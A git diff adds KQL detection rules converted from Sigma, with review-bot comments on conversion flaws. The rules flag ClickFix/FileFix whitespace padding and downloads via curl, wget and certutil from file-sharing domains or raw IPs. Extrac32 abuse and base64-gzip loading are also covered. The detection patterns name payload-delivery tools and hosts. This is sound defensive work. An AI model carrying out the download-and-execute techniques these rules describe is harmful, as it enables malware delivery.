@@ -0,0 +1,12 @@ +// Title: Suspicious Explorer Process with Whitespace Padding - ClickFix/FileFix +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-11-04 +// Level: high +// Description: Detects process creation with suspicious whitespace padding followed by a '#' character, which may indicate ClickFix or FileFix techniques used to conceal malicious commands from visual inspection. +// ClickFix and FileFix are social engineering attack techniques where adversaries distribute phishing documents or malicious links that deceive users into opening the Windows Run dialog box or File Explorer search bar. +// The victims are then instructed to paste commands from their clipboard, which contain extensive whitespace padding using various Unicode space characters to push the actual malicious command far to the right, effectively hiding it from immediate view. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.004, attack.defense-evasion, attack.t1027.010 + +DeviceProcessEvents +| where (ProcessCommandLine contains "#" and InitiatingProcessFolderPath endswith "\\explorer.exe") and (ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains " ") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/suspicious_extrac32_alternate_data_stream_execution.kql b/KQL/rules/windows/process_creation/suspicious_extrac32_alternate_data_stream_execution.kql new file mode 100644 index 00000000..a5da7450 --- /dev/null 
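Review bot: The twelve `ProcessCommandLine contains "            "` terms and the final single-character term in suspicious_explorer_process_with_whitespace_padding_clickfix_filefix.kql render identically, and nothing in the file says that they are (presumably) distinct Unicode space code points rather than thirteen copies of one literal; an editor, linter or re-save that normalises whitespace would quietly collapse the rule to a single-term match and no diff would show which code points were lost. Add a header comment stating the intent, e.g. `// NOTE: each quoted whitespace term below is a distinct Unicode space code point copied from the source rule; do not normalise, trim or deduplicate these literals`, and ideally have the generator annotate each term with its code point (`/* U+XXXX */`, placeholder) so a reviewer can verify the list against the Sigma source without a hex dump. This hunk is the whole file, so the comment belongs in the header block above `DeviceProcessEvents`.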
+++ b/KQL/rules/windows/process_creation/suspicious_extrac32_alternate_data_stream_execution.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Extrac32 Alternate Data Stream Execution
+// Author: frack113
+// Date: 2021-11-26
+// Level: medium
+// Description: Extract data from cab file and hide it in an alternate data stream
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.004
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "extrac32.exe" and ProcessCommandLine contains ".cab") and ProcessCommandLine matches regex ":[^\\\\]"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_extrac32_execution.kql b/KQL/rules/windows/process_creation/suspicious_extrac32_execution.kql
new file mode 100644
index 00000000..4c2c37b6
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_extrac32_execution.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Extrac32 Execution
+// Author: frack113
+// Date: 2021-11-26
+// Level: medium
+// Description: Download or Copy file with Extrac32
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
+| where ProcessCommandLine contains ".cab" and (ProcessCommandLine contains "extrac32.exe" or FolderPath endswith "\\extrac32.exe" or ProcessVersionInfoOriginalFileName =~ "extrac32.exe") and (ProcessCommandLine contains "/C" or ProcessCommandLine contains "/Y" or ProcessCommandLine contains " \\\\")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_file_characteristics_due_to_missing_fields.kql b/KQL/rules/windows/process_creation/suspicious_file_characteristics_due_to_missing_fields.kql
new file mode 100644
index 00000000..882207d0
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_file_characteristics_due_to_missing_fields.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious File Characteristics Due to Missing Fields
+// Author: Markus Neis, Sander Wiebing
+// Date: 2018-11-22
+// Level: medium
+// Description: Detects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with py2exe
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.006
+
+DeviceProcessEvents
+| where ((ProcessVersionInfoFileDescription =~ "?" and ProcessVersionInfoProductVersion =~ "?") or (ProcessVersionInfoFileDescription =~ "?" and ProcessVersionInfoProductName =~ "?") or (ProcessVersionInfoCompanyName =~ "?" and ProcessVersionInfoFileDescription =~ "?")) and FolderPath contains "\\Downloads\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_file_download_from_file_sharing_domain_via_curl_exe.kql b/KQL/rules/windows/process_creation/suspicious_file_download_from_file_sharing_domain_via_curl_exe.kql
new file mode 100644
index 00000000..f07667f3
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_file_download_from_file_sharing_domain_via_curl_exe.kql
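Review bot: The `=~ "?"` comparisons in suspicious_file_characteristics_due_to_missing_fields.kql carry over the literal placeholder that the source rule expects from Sysmon for an absent version-info field; in DeviceProcessEvents the ProcessVersionInfo* columns are, as far as I can tell, simply empty when the PE has no version resource, so this rule is unlikely to ever match on that table. Consider rendering each term as `isempty(ProcessVersionInfoFileDescription)` (and likewise for ProcessVersionInfoProductVersion, ProcessVersionInfoProductName and ProcessVersionInfoCompanyName), or at least `(ProcessVersionInfoFileDescription =~ "?" or isempty(ProcessVersionInfoFileDescription))`, and add a header line noting that the source rule's FileVersion field was mapped onto ProcessVersionInfoProductVersion, which is not the same attribute. Both points look like converter-wide field-mapping behaviour rather than something specific to this file, so fixing them in the generator would cover the other rules that compare against "?".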
@@ -0,0 +1,10 @@
+// Title: Suspicious File Download From File Sharing Domain Via Curl.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-05
+// Level: high
+// Description: Detects potentially suspicious file download from file sharing domains using curl.exe
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".ps1'" or ProcessCommandLine endswith ".ps1\"" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dat'" or ProcessCommandLine endswith ".dat\"" or ProcessCommandLine endswith ".msi" or ProcessCommandLine endswith ".msi'" or ProcessCommandLine endswith ".msi\"" or ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".bat'" or ProcessCommandLine endswith ".bat\"" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".exe'" or ProcessCommandLine endswith ".exe\"" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".vbs'" or ProcessCommandLine endswith ".vbs\"" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbe'" or ProcessCommandLine endswith ".vbe\"" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".hta'" or ProcessCommandLine endswith ".hta\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".psm1'" or ProcessCommandLine endswith ".psm1\"") and (ProcessCommandLine contains " -O" or ProcessCommandLine contains "--remote-name" or ProcessCommandLine contains "--output") and ProcessCommandLine contains "http" and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe") and (ProcessCommandLine contains ".githubusercontent.com" or ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "github.com" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "pages.dev" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "pixeldrain.com" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "trycloudflare.com" or ProcessCommandLine contains "ufile.io" or ProcessCommandLine contains "w3spaces.com" or ProcessCommandLine contains "workers.dev")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_file_download_from_file_sharing_domain_via_wget_exe.kql b/KQL/rules/windows/process_creation/suspicious_file_download_from_file_sharing_domain_via_wget_exe.kql
new file mode 100644
index 00000000..74c057a6
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_file_download_from_file_sharing_domain_via_wget_exe.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious File Download From File Sharing Domain Via Wget.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-05
+// Level: high
+// Description: Detects potentially suspicious file downloads from file sharing domains using wget.exe
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".ps1'" or ProcessCommandLine endswith ".ps1\"" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dat'" or ProcessCommandLine endswith ".dat\"" or ProcessCommandLine endswith ".msi" or ProcessCommandLine endswith ".msi'" or ProcessCommandLine endswith ".msi\"" or ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".bat'" or ProcessCommandLine endswith ".bat\"" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".exe'" or ProcessCommandLine endswith ".exe\"" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".vbs'" or ProcessCommandLine endswith ".vbs\"" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbe'" or ProcessCommandLine endswith ".vbe\"" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".hta'" or ProcessCommandLine endswith ".hta\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".psm1'" or ProcessCommandLine endswith ".psm1\"") and (ProcessCommandLine matches regex "\\s-O\\s" or ProcessCommandLine contains "--output-document") and ProcessCommandLine contains "http" and (FolderPath endswith "\\wget.exe" or ProcessVersionInfoOriginalFileName =~ "wget.exe") and (ProcessCommandLine contains ".githubusercontent.com" or ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "github.com" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "pages.dev" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "pixeldrain.com" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "trycloudflare.com" or ProcessCommandLine contains "ufile.io" or ProcessCommandLine contains "w3spaces.com" or ProcessCommandLine contains "workers.dev")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_file_download_from_ip_via_curl_exe.kql b/KQL/rules/windows/process_creation/suspicious_file_download_from_ip_via_curl_exe.kql
new file mode 100644
index 00000000..02a5cd5d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_file_download_from_ip_via_curl_exe.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious File Download From IP Via Curl.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-07-27
+// Level: high
+// Description: Detects potentially suspicious file downloads directly from IP addresses using curl.exe
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".bat\"" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dat\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".exe\"" or ProcessCommandLine endswith ".gif" or ProcessCommandLine endswith ".gif\"" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".hta\"" or ProcessCommandLine endswith ".jpeg" or ProcessCommandLine endswith ".jpeg\"" or ProcessCommandLine endswith ".log" or ProcessCommandLine endswith ".log\"" or ProcessCommandLine endswith ".msi" or ProcessCommandLine endswith ".msi\"" or ProcessCommandLine endswith ".png" or ProcessCommandLine endswith ".png\"" or ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".ps1\"" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".psm1\"" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbe\"" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".vbs\"" or ProcessCommandLine endswith ".bat'" or ProcessCommandLine endswith ".dat'" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine endswith ".exe'" or ProcessCommandLine endswith ".gif'" or ProcessCommandLine endswith ".hta'" or ProcessCommandLine endswith ".jpeg'" or ProcessCommandLine endswith ".log'" or ProcessCommandLine endswith ".msi'" or ProcessCommandLine endswith ".png'" or ProcessCommandLine endswith ".ps1'" or ProcessCommandLine endswith ".psm1'" or ProcessCommandLine endswith ".vbe'" or ProcessCommandLine endswith ".vbs'") and (ProcessCommandLine contains " -O" or ProcessCommandLine contains "--remote-name" or ProcessCommandLine contains "--output") and ProcessCommandLine contains "http" and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe") and ProcessCommandLine matches regex "://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_file_download_from_ip_via_wget_exe.kql b/KQL/rules/windows/process_creation/suspicious_file_download_from_ip_via_wget_exe.kql
new file mode 100644
index 00000000..5680ffe4
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_file_download_from_ip_via_wget_exe.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious File Download From IP Via Wget.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-07-27
+// Level: high
+// Description: Detects potentially suspicious file downloads directly from IP addresses using Wget.exe
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".ps1'" or ProcessCommandLine endswith ".ps1\"" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dat'" or ProcessCommandLine endswith ".dat\"" or ProcessCommandLine endswith ".msi" or ProcessCommandLine endswith ".msi'" or ProcessCommandLine endswith ".msi\"" or ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".bat'" or ProcessCommandLine endswith ".bat\"" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".exe'" or ProcessCommandLine endswith ".exe\"" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".vbs'" or ProcessCommandLine endswith ".vbs\"" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbe'" or ProcessCommandLine endswith ".vbe\"" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".hta'" or ProcessCommandLine endswith ".hta\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".psm1'" or ProcessCommandLine endswith ".psm1\"") and (ProcessCommandLine matches regex "\\s-O\\s" or ProcessCommandLine contains "--output-document") and ProcessCommandLine contains "http" and (FolderPath endswith "\\wget.exe" or ProcessVersionInfoOriginalFileName =~ "wget.exe") and ProcessCommandLine matches regex "://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_file_download_from_ip_via_wget_exe_paths.kql b/KQL/rules/windows/process_creation/suspicious_file_download_from_ip_via_wget_exe_paths.kql
new file mode 100644
index 00000000..c3745c13
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_file_download_from_ip_via_wget_exe_paths.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious File Download From IP Via Wget.EXE - Paths
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-02-23
+// Level: high
+// Description: Detects potentially suspicious file downloads directly from IP addresses and stored in suspicious locations using Wget.exe
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where (ProcessCommandLine matches regex "\\s-O\\s" or ProcessCommandLine contains "--output-document") and ProcessCommandLine contains "http" and (FolderPath endswith "\\wget.exe" or ProcessVersionInfoOriginalFileName =~ "wget.exe") and ProcessCommandLine matches regex "://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}" and ((ProcessCommandLine contains ":\\PerfLogs\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Help\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\Temporary Internet") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favorites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favourites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Contacts\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Pictures\\"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_file_downloaded_from_direct_ip_via_certutil_exe.kql b/KQL/rules/windows/process_creation/suspicious_file_downloaded_from_direct_ip_via_certutil_exe.kql
new file mode 100644
index 00000000..b4f0f0ac
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_file_downloaded_from_direct_ip_via_certutil_exe.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious File Downloaded From Direct IP Via Certutil.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-15
+// Level: high
+// Description: Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027, attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "urlcache " or ProcessCommandLine contains "verifyctl " or ProcessCommandLine contains "URL ") and (ProcessCommandLine contains "://1" or ProcessCommandLine contains "://2" or ProcessCommandLine contains "://3" or ProcessCommandLine contains "://4" or ProcessCommandLine contains "://5" or ProcessCommandLine contains "://6" or ProcessCommandLine contains "://7" or ProcessCommandLine contains "://8" or ProcessCommandLine contains "://9") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")) and (not(ProcessCommandLine contains "://7-"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_file_downloaded_from_file_sharing_website_via_certutil_exe.kql b/KQL/rules/windows/process_creation/suspicious_file_downloaded_from_file_sharing_website_via_certutil_exe.kql
new file mode 100644
index 00000000..37babf2c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_file_downloaded_from_file_sharing_website_via_certutil_exe.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-15
+// Level: high
+// Description: Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027, attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "urlcache " or ProcessCommandLine contains "verifyctl " or ProcessCommandLine contains "URL ") and (ProcessCommandLine contains ".githubusercontent.com" or ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "github.com" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "pages.dev" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "trycloudflare.com" or ProcessCommandLine contains "ufile.io" or ProcessCommandLine contains 
"w3spaces.com" or ProcessCommandLine contains "workers.dev") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_file_encoded_to_base64_via_certutil_exe.kql b/KQL/rules/windows/process_creation/suspicious_file_encoded_to_base64_via_certutil_exe.kql
new file mode 100644
index 00000000..e3b0c584
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_file_encoded_to_base64_via_certutil_exe.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious File Encoded To Base64 Via Certutil.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-15
+// Level: high
+// Description: Detects the execution of certutil with the "encode" flag to encode a file to base64 where the extensions of the file is suspicious
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-encode" or ProcessCommandLine contains "/encode" or ProcessCommandLine contains "–encode" or ProcessCommandLine contains "—encode" or ProcessCommandLine contains "―encode") and (ProcessCommandLine contains ".acl" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".doc" or ProcessCommandLine contains ".gif" or ProcessCommandLine contains ".jpeg" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".mp3" or ProcessCommandLine contains ".pdf" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".ppt" or ProcessCommandLine contains ".tmp" or ProcessCommandLine contains ".xls" or ProcessCommandLine contains ".xml") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_file_execution_from_internet_hosted_webdav_share.kql b/KQL/rules/windows/process_creation/suspicious_file_execution_from_internet_hosted_webdav_share.kql
new file mode 100644
index 00000000..4847028b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_file_execution_from_internet_hosted_webdav_share.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious File Execution From Internet Hosted WebDav Share
+// Author: pH-T (Nextron Systems)
+// Date: 2022-09-01
+// Level: high
+// Description: Detects the execution of the "net use" command to mount a WebDAV server and then immediately execute some content in it. As seen being used in malicious LNK files
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " net use http" and ProcessCommandLine contains "& start /b " and ProcessCommandLine contains "\\DavWWWRoot\\") and (ProcessCommandLine contains ".exe " or ProcessCommandLine contains ".dll " or ProcessCommandLine contains ".bat " or ProcessCommandLine contains ".vbs " or ProcessCommandLine contains ".ps1 ") and (FolderPath contains "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.EXE")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_filefix_execution_pattern.kql b/KQL/rules/windows/process_creation/suspicious_filefix_execution_pattern.kql
new file mode 100644
index 00000000..565e4e2b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_filefix_execution_pattern.kql
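Review bot: The image check at the end of this rule's `where` line uses `FolderPath contains "\\cmd.exe"`, whereas every sibling rule in this chunk anchors the image with `endswith` (for example `FolderPath endswith "\\certutil.exe"` two hunks up). `contains` also matches any path that merely has `\cmd.exe` somewhere inside it, so the term is looser than the rest of the conversion; if the Sigma source uses `Image|endswith`, this is a converter artifact and the term should read `FolderPath endswith "\\cmd.exe"`. If the source deliberately uses a substring match, a header comment stating that would stop the next reader from "fixing" it.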
@@ -0,0 +1,15 @@
+// Title: Suspicious FileFix Execution Pattern
+// Author: 0xFustang, Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-11-24
+// Level: high
+// Description: Detects suspicious FileFix execution patterns where users are tricked into running malicious commands through browser file upload dialog manipulation.
+// This attack typically begins when users visit malicious websites impersonating legitimate services or news platforms,
+// which may display fake CAPTCHA challenges or direct instructions to open file explorer and paste clipboard content.
+// The clipboard content usually contains commands that download and execute malware, such as information stealing tools.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.004
+// False Positives:
+// - Legitimate use of PowerShell or other utilities launched from browser extensions or automation tools
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "#" and (InitiatingProcessFolderPath endswith "\\brave.exe" or InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe")) and ((ProcessCommandLine contains "account" or ProcessCommandLine contains "anti-bot" or ProcessCommandLine contains "botcheck" or ProcessCommandLine contains "captcha" or ProcessCommandLine contains "challenge" or ProcessCommandLine contains "confirmation" or ProcessCommandLine contains "fraud" or ProcessCommandLine contains "human" or ProcessCommandLine contains "identification" or ProcessCommandLine contains "identificator" or ProcessCommandLine contains "identity" or ProcessCommandLine contains "robot" or ProcessCommandLine contains "validation" or ProcessCommandLine contains "verification" or ProcessCommandLine contains "verify") or (ProcessCommandLine contains "%comspec%" or ProcessCommandLine contains "bitsadmin" or ProcessCommandLine contains "certutil" or ProcessCommandLine contains 
"cmd" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "curl" or ProcessCommandLine contains "finger" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "pwsh" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "schtasks" or ProcessCommandLine contains "wget" or ProcessCommandLine contains "wscript"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_frombase64string_usage_on_gzip_archive_process_creation.kql b/KQL/rules/windows/process_creation/suspicious_frombase64string_usage_on_gzip_archive_process_creation.kql
new file mode 100644
index 00000000..5f086383
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_frombase64string_usage_on_gzip_archive_process_creation.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious FromBase64String Usage On Gzip Archive - Process Creation
+// Author: frack113
+// Date: 2022-12-23
+// Level: medium
+// Description: Detects attempts of decoding a base64 Gzip archive via PowerShell. This technique is often used as a method to load malicious content into memory afterward.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1132.001
+// False Positives:
+// - Legitimate administrative script
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "FromBase64String" and ProcessCommandLine contains "MemoryStream" and ProcessCommandLine contains "H4sI"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_git_clone.kql b/KQL/rules/windows/process_creation/suspicious_git_clone.kql
new file mode 100644
index 00000000..5eaf3723
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_git_clone.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Git Clone
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-03
+// Level: medium
+// Description: Detects execution of "git" in order to clone a remote repository that contain suspicious keywords which might be suspicious
+// MITRE Tactic: Reconnaissance
+// Tags: attack.reconnaissance, attack.t1593.003
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " clone " or ProcessCommandLine contains "git-remote-https ") and ((FolderPath endswith "\\git.exe" or FolderPath endswith "\\git-remote-https.exe") or ProcessVersionInfoOriginalFileName =~ "git.exe") and (ProcessCommandLine contains "exploit" or ProcessCommandLine contains "Vulns" or ProcessCommandLine contains "vulnerability" or ProcessCommandLine contains "RemoteCodeExecution" or ProcessCommandLine contains "Invoke-" or ProcessCommandLine contains "CVE-" or ProcessCommandLine contains "poc-" or ProcessCommandLine contains "ProofOfConcept" or ProcessCommandLine contains "proxyshell" or ProcessCommandLine contains "log4shell" or ProcessCommandLine contains "eternalblue" or ProcessCommandLine contains "eternal-blue" or ProcessCommandLine contains "MS17-")
\ No newline at end of file
